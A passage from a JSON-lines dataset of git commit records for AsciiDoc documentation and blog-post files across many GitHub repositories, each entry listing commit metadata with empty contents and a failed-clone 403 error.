403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc400770c960d6349c8980646322f2fed9c871b1","subject":"Update 2016-06-11-Como-usar-este-editor.adoc","message":"Update 2016-06-11-Como-usar-este-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b8ac1834a8cd4223160ea4f4084590225256876","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8649e385f1d658bd531a9d093e7548ac8895d95f","subject":"Update 2017-04-20-Sulla-via-del-ritorno.adoc","message":"Update 2017-04-20-Sulla-via-del-ritorno.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-20-Sulla-via-del-ritorno.adoc","new_file":"_posts\/2017-04-20-Sulla-via-del-ritorno.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f94a3026a1df58128a9f6ed453f69e1d232c081b","subject":"Update 2010-01-01-Test-Post.adoc","message":"Update 2010-01-01-Test-Post.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2010-01-01-Test-Post.adoc","new_file":"_posts\/2010-01-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2280f4251e4cbce4cbcc44d586b1a95e561c88c","subject":"Update 2016-04-24-test-post.adoc","message":"Update 2016-04-24-test-post.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-24-test-post.adoc","new_file":"_posts\/2016-04-24-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2fc0e0157dc3c29ca0ca2d91eecb6e1ecb06b8e","subject":"Add blueprint doc","message":"Add blueprint doc\n","repos":"scranton\/camel,DariusX\/camel,sverkera\/camel,christophd\/camel,NickCis\/camel,mcollovati\/camel,zregvart\/camel,mcollovati\/camel,allancth\/camel,cunningt\/camel,pkletsko\/camel,driseley\/camel,driseley\/camel,jkorab\/camel,lburgazzoli\/apache-camel,nikhilvibhav\/camel,rmarting\/camel,pax95\/camel,objectiser\/camel,RohanHart\/camel,anton-k11\/camel,anoordover\/camel,RohanHart\/camel,pmoerenhout\/camel,RohanHart\/camel,gautric\/camel,tlehoux\/camel,CodeSmell\/camel,anoordover\/camel,snurmine\/camel,davidkarlsen\/camel,adessaigne\/camel,jamesnetherton\/camel,rmarting\/camel,prashant2402\/camel,acartapanis\/camel,yuruki\/camel,christophd\/camel,yuruki\/camel,rmarting\/camel,punkhorn\/camel-upstream,zregvart\/camel,anoordover\/camel,akhettar\/camel,ssharma\/camel,akhettar\/camel,apache\/camel,pkletsko\/camel,lburgazzoli\/camel,Thopap\/camel,tadayosi\/camel,jkorab\/camel,nboukhed\/camel,adessaigne\/camel,kevinearls\/camel,jamesnetherton\/camel,mgyongyosi\/camel,tadayosi\/camel,adessaigne\/camel,rmarting\/camel,cunningt\/camel,allancth\/camel,w4tson\/camel,tdiesler\/camel,driseley\/camel,anoordover\/camel,veithen\/camel,tlehoux\/camel,apache\/camel,allancth\/camel,anton-k11\/camel,dmvolod\/camel,lburgazzoli\/camel,akhettar\/camel,lburgazzoli\/camel,punkhorn\/camel-upstream,acartapanis\/camel,rmarting\/camel,nicolaferraro\/camel,gnodet\/camel,ssharma\/camel,nikhilvibhav\/camel,jonmcewen\/camel,w4tson\/camel,tdiesler\/camel,sverkera\/camel,cunningt\/camel,allancth\/camel,tlehoux\/camel,Thopap\/camel,alvinkwekel\/camel,prashant2402\/camel,isavin\/camel,jonmcewen\/camel,curso007\/camel,mcollovati\/camel,onders86\/camel,akhettar\/camel,snurmine\/camel,tadayosi\/camel,drsquidop\/camel,yuruki\/camel,dmvolod\/camel,gnodet\/camel,zregvart\/camel,zregvart\/camel,sverkera\/camel,NickCis\/camel,lburgazzoli\/apache-camel,allancth\/camel,Fabryprog\/camel,prashant2402\/camel,pmoerenhout\/camel,ullgren\/camel,pax95\/camel,pax95\/camel,anton-k11\/camel,DariusX\/camel,ssharma\/camel,driseley\/camel,curso007\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,acartapanis\/camel,christophd\/camel,acartapanis\/camel,veithen\/camel,scranton\/camel,pkletsko\/camel,christophd\/camel,jonmcewen\/camel,jonmcewen\/camel,snurmine\/camel,Thopap\/camel,onders86\/camel,w4tson\/camel,gnodet\/camel,Thopap\/camel,jamesnetherton\/camel,ssharma\/camel,nboukhed\/camel,nicolaferraro\/camel,jamesnetherton\/camel,nboukhed\/camel,prashant2402\/camel,dmvolod\/camel,anoordover\/camel,prashant2402\/camel,punkhorn\/camel-upstream,pax95\/camel,ullgren\/camel,RohanHart\/camel,salikjan\/camel,nboukhed\/camel,Thopap\/camel,tadayosi\/camel,allancth\/camel,tlehoux\/camel,lburgazzoli\/camel,CodeSmell\/camel,Fabryprog\/camel,drsquidop\/camel,apache\/camel,jkorab\/camel,jkorab\/camel,prashant2402\/camel,adessaigne\/camel,apache\/camel,tdiesler\/camel,Thopap\/camel,kevinearls\/camel,RohanHart\/camel,sverkera\/camel,ssharma\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,kevinearls\/camel,chirino\/camel,anton-k11\/camel,mcollovati\/camel,yuruki\/camel,jonmcewen\/camel,jonmcewen\/camel,drsquidop\/camel,anton-k11\/camel,alvinkwekel\/camel,chirino\/camel,pax95\/camel,tlehoux\/camel,chirino\/camel,adessaigne\/camel,akhettar\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,driseley\/camel,davidkarlsen\/camel,mgyongyosi\/camel,tdiesler\/camel,onders86\/camel,scranton\/camel,adessaigne\/camel,pmoerenhout\/camel,anton-k11\/camel,gautric\/camel,gnodet\/camel,nikhilvibhav\/camel,kevinearls\/camel,veithen\/camel,objectiser\/camel,dmvolod\/camel,jkorab\/camel,lburgazzoli\/camel,pkletsko\/camel,yuruki\/camel,punkhorn\/camel-upstream,christophd\/camel,rmarting\/camel,salikjan\/camel,apache\/camel,dmvolod\/camel,alvinkwekel\/camel,kevinearls\/camel,gnodet\/camel,sverkera\/camel,ullgren\/camel,onders86\/camel,curso007\/camel,lburgazzoli\/camel,acartapanis\/camel,pkletsko\/camel,w4tson\/camel,gautric\/camel,gautric\/camel,mgyongyosi\/camel,gautric\/camel,snurmine\/camel,curso007\/camel,apache\/camel,akhettar\/camel,veithen\/camel,nicolaferraro\/camel,pmoerenhout\/camel,isavin\/camel,tdiesler\/camel,chirino\/camel,gautric\/camel,veithen\/camel,ullgren\/camel,anoordover\/camel,drsquidop\/camel,NickCis\/camel,christophd\/camel,objectiser\/camel,Fabryprog\/camel,tadayosi\/camel,onders86\/camel,yuruki\/camel,w4tson\/camel,dmvolod\/camel,pmoerenhout\/camel,pax95\/camel,veithen\/camel,w4tson\/camel,cunningt\/camel,CodeSmell\/camel,NickCis\/camel,nboukhed\/camel,mgyongyosi\/camel,NickCis\/camel,NickCis\/camel,DariusX\/camel,snurmine\/camel,scranton\/camel,scranton\/camel,Fabryprog\/camel,davidkarlsen\/camel,nboukhed\/camel,snurmine\/camel,objectiser\/camel,pkletsko\/camel,alvinkwekel\/camel,ssharma\/camel,CodeSmell\/camel,nikhilvibhav\/camel,RohanHart\/camel,tlehoux\/camel,drsquidop\/camel,DariusX\/camel,cunningt\/camel,jamesnetherton\/camel,chirino\/camel,curso007\/camel,driseley\/camel,isavin\/camel,isavin\/camel,isavin\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,onders86\/camel,tdiesler\/camel,mgyongyosi\/camel,scranton\/camel,isavin\/camel,curso007\/camel,jkorab\/camel,acartapanis\/camel,sverkera\/camel,davidkarlsen\/camel,cunningt\/camel,chirino\/camel,drsquidop\/camel,mgyongyosi\/camel,nicolaferraro\/camel","old_file":"components\/camel-blueprint\/src\/main\/docs\/blueprint.adoc","new_file":"components\/camel-blueprint\/src\/main\/docs\/blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6009392e8d1a2e416b95a5bf7247835a31a51744","subject":"Update 2016-01-04-Setting-Up-The-Koder.adoc","message":"Update 2016-01-04-Setting-Up-The-Koder.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-01-04-Setting-Up-The-Koder.adoc","new_file":"_posts\/2016-01-04-Setting-Up-The-Koder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c83c2263bd10fd9da800a7ddcafcc74169ea7578","subject":"Update 2016-02-25-Shooting-360-H-D-R-I.adoc","message":"Update 2016-02-25-Shooting-360-H-D-R-I.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-25-Shooting-360-H-D-R-I.adoc","new_file":"_posts\/2016-02-25-Shooting-360-H-D-R-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4059271a3da2ea08efd54c188ce668fa1b2c89","subject":"Update 2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","message":"Update 2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_file":"_posts\/2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6cec989dcea41c866e4df41182bec7688281f04","subject":"Update 2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","message":"Update 2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","repos":"jerometambo\/blog,jerometambo\/blog,jerometambo\/blog,jerometambo\/blog","old_file":"_posts\/2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","new_file":"_posts\/2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerometambo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19f6d6eb1f073338ebd21480cac1157f2b9be3ca","subject":"added queries and types","message":"added queries and types\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21b1ae940f6e182405d1ca2a99fa5fd2f4d53c81","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"358a22ffdffe6d3b51d065da7bbc098292ed1941","subject":"Update 2013-09-27-javaee7-api-websocket-html5.adoc","message":"Update 2013-09-27-javaee7-api-websocket-html5.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-09-27-javaee7-api-websocket-html5.adoc","new_file":"_posts\/2013-09-27-javaee7-api-websocket-html5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ab55e6e3912de59c1860764fa459c0944597a24","subject":"y2b create post Mystery Unboxing From Intel","message":"y2b create post Mystery Unboxing From Intel","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-18-Mystery-Unboxing-From-Intel.adoc","new_file":"_posts\/2016-07-18-Mystery-Unboxing-From-Intel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7597e197d9c1c079180012fafff3779efe9e679b","subject":"Update 2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","message":"Update 2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","new_file":"_posts\/2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd8ce34f19a7c49e0c1d7f77d042c2f7ac75dced","subject":"y2b create post DON'T Buy The Batband, Unless...","message":"y2b create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-03-DON'T%20Buy%20The%20Batband%2C%20Unless....adoc","new_file":"_posts\/2017-12-03-DON'T%20Buy%20The%20Batband%2C%20Unless....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"605816467c093fc0881747b6184fae32c857743f","subject":"y2b create post Kindle Fire HD Unboxing (Amazon Kindle Fire HD 7\\","message":"y2b create post Kindle Fire HD Unboxing (Amazon Kindle Fire HD 7\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-14-Kindle-Fire-HD-Unboxing-Amazon-Kindle-Fire-HD-7.adoc","new_file":"_posts\/2012-09-14-Kindle-Fire-HD-Unboxing-Amazon-Kindle-Fire-HD-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edaa9c526c792f0bc20c06c58391e3dec0fe2861","subject":"Planning S4","message":"Planning S4\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c12fc70fe9ece2d87ea3c9a1aeb848e02c6c2095","subject":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","message":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc4e600aff2dbd87f82a1f42250fbf9baf7ce9d6","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71f3947d969d9634db49440190543b672de2f160","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8b9fa981fc24e3386a2d2f70886996514b48a6c","subject":"y2b create post Is The LG V30 The Most Underrated Smartphone?","message":"y2b create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-03-IsTheLGV30TheMostUnderratedSmartphone.adoc","new_file":"_posts\/2018-02-03-IsTheLGV30TheMostUnderratedSmartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d88a497571633971a9d6e1bebf35e66cb0b8760","subject":"y2b create post Note 4 Unboxing - Is Gap Gate Real?","message":"y2b create post Note 4 Unboxing - Is Gap Gate Real?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-03-Note-4-Unboxing--Is-Gap-Gate-Real.adoc","new_file":"_posts\/2014-10-03-Note-4-Unboxing--Is-Gap-Gate-Real.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb63d03ab9999274eed74d6f5cae65bcf410184","subject":"Documentation reword on get user","message":"Documentation reword on get user\n","repos":"jonrf93\/jtsoluciones,jonrf93\/jtsoluciones,jonrf93\/jtsoluciones,jonrf93\/jtsoluciones","old_file":"jtsoluciones-rest\/src\/main\/resources\/documentation\/index.adoc","new_file":"jtsoluciones-rest\/src\/main\/resources\/documentation\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonrf93\/jtsoluciones.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9d7a81ca1222c2c80858b3b510fbd2b4b51dad7","subject":"Update 2016-04-23-learn-to-code.adoc","message":"Update 2016-04-23-learn-to-code.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-23-learn-to-code.adoc","new_file":"_posts\/2016-04-23-learn-to-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fafa254a02f9948cdf4421ed8be798869476d107","subject":"Fix volume paths in README","message":"Fix volume paths in README\n","repos":"redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,BBVA\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"136e73be3154368959eb54a51a8115a4a46f94bd","subject":"Flesh out readme a little","message":"Flesh out readme a little\n\n[skip ci]\n","repos":"lassik\/extract,lassik\/extract","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"4c20a21f3b824635bc23809307357a27e28cff01","subject":"Link to Home Page","message":"Link to Home Page\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"349b4e39945dd88e698a7757cfabb3179964f50d","subject":"Update 2017-04-06-Download-music-using-Scrapy-Python.adoc","message":"Update 2017-04-06-Download-music-using-Scrapy-Python.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-06-Download-music-using-Scrapy-Python.adoc","new_file":"_posts\/2017-04-06-Download-music-using-Scrapy-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f8519ab77360567c91838da0213c6fdf9624d0a","subject":"Update 2018-01-23-GraphQL.adoc","message":"Update 2018-01-23-GraphQL.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-01-23-GraphQL.adoc","new_file":"_posts\/2018-01-23-GraphQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a409688d3e95917948847e2b80a097dc8185ea6","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"545b30fcdbd75ca381e875850bc906fd3c68c40e","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32d17792d36c564db1ca39b05270b10e5dc68dcf","subject":"Deleted _posts\/2016-12-01-Test.adoc","message":"Deleted _posts\/2016-12-01-Test.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Test.adoc","new_file":"_posts\/2016-12-01-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aef56591ee2a35fd325d2d9343dfccade75652a","subject":"Issue #533 Converted README to asciidoc and cleaned up unnecessary information, updated links","message":"Issue #533 Converted README to asciidoc and cleaned up unnecessary information, updated links\n","repos":"budhrg\/minishift,LalatenduMohanty\/minishift,thatdocslady\/minishift,jimmidyson\/minishift,minishift\/minishift,minishift\/minishift,budhrg\/minishift,budhrg\/minishift,Preeticp\/minishift,jimmidyson\/minishift,LalatenduMohanty\/minishift,praveenkumar\/minishift,minishift\/minishift,jimmidyson\/minishift,Preeticp\/minishift,thatdocslady\/minishift,praveenkumar\/minishift,LalatenduMohanty\/minishift,Preeticp\/minishift,thatdocslady\/minishift,praveenkumar\/minishift","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jimmidyson\/minishift.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a61ce1fea31c97db165d92abc968931100fe822c","subject":"Added a link to the license page in the badge","message":"Added a link to the license page in the badge\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21dc41eb0d7bd54bb1a5b989208192ea00822b50","subject":"Remove redundant build instructions from the README","message":"Remove redundant build instructions from the README\n\nChange-Id: Ifc4e8a125e0215f816eafc686b0ac1cbfd4d0d9e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1175\nReviewed-by: Misty Stanley-Jones 